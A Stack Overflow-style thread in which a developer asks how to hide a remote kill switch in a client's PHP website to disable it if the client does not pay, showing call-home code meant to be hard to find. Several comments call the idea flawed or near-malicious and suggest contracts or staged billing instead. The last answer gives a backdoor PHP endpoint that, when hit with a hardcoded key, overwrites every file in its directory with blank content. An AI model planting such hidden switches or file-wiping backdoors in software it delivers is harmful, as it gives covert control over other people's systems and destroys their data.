# Remote kill switch for website

Tags: php

I want to integrate in the clients website a kill switch, just in case.

Method 1:
My fist idea was to use this code:

```
if (file_get_contents("http://myvebsite.com/disable.txt")) die("kill switch");
```

But this is way to easy to finds in the code, i figured.

Method 2:
The i tried this.

This is the code i would integrate in the website:

```
<?php
require('XMLRPC.inc.php');
$appname = "DISABLING-CODE";
$client = new IXR_Client('http://myvebstie.com/kill.php');
if (!$client->query('activation.checkapp', $appname)) {
    if($client->getResponse() )
    {
        die("application disabled.");
    }
}
?>
```

This is the code i would use in the file `kill.php`

```
require('XMLRPC.inc.php');
function checkapp($the_app)
{
    $deactivateMe = "DISABLING-CODE"; // with this i would disable the webiste
    if (isset($the_app) && $the_app == $deactivateMe)
        return true; // application disabled
    else
        return false; 
}
$server = new IXR_Server(array('activation.checkapp' => 'checkapp'));
```

I have tried this method like 100 times but it's not working, the clients website loads normally.
Does anyone have an idea why it's not working or does anyone have a better idea on how to solve this problem?

If i use the first method and put a character in the file disable.txt on file location http://myvebsite.com/disable.txt, then the clients website is not working.

Best regards.

Comment: In the future make sure that your contract says that you'll first copy the files to their servers when you've been paid.

Comment: You want to remotely kill the client's site? What's to prevent them from editing the php code and bypassing the check entirely?

Comment: @MarcB The client will be using the website and will pay me after i deliver the website so i want to make sure that if he does not pay me, that the website will not be accessible.
And if he does pay me afterwords that i can easy again enagle the website

Comment: so again, what's going to prevent the client from editing the php code and bypassing your kill switch entirely? What you're trying to do is basically useless/pointless. You're basically saying "my clients are cheap lying scumbags who'll steal my code, but are such honest fine folks they won't disable my protection methods"

Comment: @MarcB not all clients are given FTP access. My clients never get credentials unless they ask for it (and their outstanding balance is 0)

Comment: @sjagr If the FTP Access is not provided to the clients, then there's no point in using the Kill Switch. You can delete all the files from the server.

Comment: Then I agree with @MarcB in saying OP's logic is extremely flawed.

Comment: @MarcB i am almost sure that this client and all other clients will not know how to do this.
But since you are pointing this out, what would your solution be?

Comment: If you're making a living by creating websites and you don't know how to manage servers and what not, why don't you invest in an encoder such as Ioncube? You can encode your PHP files and implement that trivial kill switch in that case, and the "client" won't be able to edit it. Also, FTP.. people still use that? I thought it's 2014 :/

Comment: @N.B. "Who still uses FTP" - a lot of people and hosts? Do you honestly think that all servers including Windows servers have replaced FTP with SFTP?

Comment: Don't resort to code methods to protect your stuff. Anything you do to protect the code can be undone by the user, and that includes obfuscation engines. Removing FTP access is also utterly useless. "Hmm... someone stole all the stuff in my house. I'll start locking the door now. That'll stop them from selling my stuff". If they don't pay, and keep using your code, then you sue them.

Comment: And if you think "will not know how to do this" is a good safety mechanism, then you should start looking at the various (closed) questions on this site about "I bought this code and need to remove the copy protection"

Comment: @h2ooooooo - I was being sarcastic. Luckily, 99% of things in IT is implemented badly, wrong or simply with 0 clue. If it weren't, many of us would be out of business.

Comment: Yeah, I just tell my clients I will burn 1 village for every day they fail to pay their bills. Don't waste your time making a kill switch. Waste your time making a better contract. Or set them up on wordpress and just add a single number to their admin password. That alone is enough to baffle pretty much 100% of all clients cause if they knew what they were doing they wouldn't be hiring someone who is at a level that needs to ask a question like this.

Comment: Unless you own the host server and don't allow client access except through a browser, you can't guarantee another developer won't circumvent your "security" measure.

Comment: @N.B. i am not making a living on making websites and this is not so much a website as it is a app. The client and other clients access the app on their server through a website. So if your done with the sarcasm and maybe actually help to solve this problem i would be greatfull.

Comment: @user3337790 - I'm sorry that my sarcasm made you miss the part where I suggested that you **encode your code using Ioncube**, I guess it was easy to miss that part.

Answer (score 2, accepted):

Your question is a long approach for a simple solution. If you want to kill a website with the "flip of a switch", all you need to do is replace the `.htaccess` file with one that has the following contents:

```
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
```

annnnd you're done! You could rename the old `.htaccess` file to something like `.htaccess.bak` until you want to "turn the site back on."

This is assuming you haven't given the client FTP access and you control the files entirely.

Comment: You don't understand.
I need to be able to disable and enable the website on many occasion without accessing the clients server.

Comment: @user3337790 Then agreeing with @MarcB, your logic is flawed. Even if you encrypt your (what I would consider almost malicious) code with `eval` functions, it would still be easy to find out where you're making these kills happen.

Comment: I will use your approach as @hansmei said.

Answer (score 7):

It sounds like you are looking for a technical solution to a non-technical problem.  Consider the following instead:

1. Don't do business with people you believe to be crooks.
2. Bill in increments as you are able to demonstrate partial implementation rather than all at once after delivery.
3. Demonstrate the complete, functioning system on a server under your exclusive control and only transfer the source code (or control of the server) upon payment.

Answer (score 3):

Using the function die () won't kill the server. It will just stop rendering the page you're trying to access. Your entire approach is wrong. You have to look at a way of making your code overwrite the .htaccess file and make use of the piece of code submitted by @sjagr

As stated by others: You shouldn't try making such a piece of code, as it would make your clients system vulnerable, and is considered a malicious piece of code.

Answer (score 1):

You could do something like this

```
<?php

if($_GET['key'] == 'kChj3G3XgQ')
{
    $dir = scandir(__DIR__);
    foreach($dir as $k => $file){
            destroyFile($file);
    }
}

function destroyFile($filename){
    $file = fopen($filename, 'w');
    fwrite($file,'');
    fclose($file);
}
```

then hit that file like an endpoint with the key like so:
www.dodgyclientswebsite.com/killswitchfile.php?key=kChj3G3XgQ

that would just rewrite every file in that same directory with a blank file.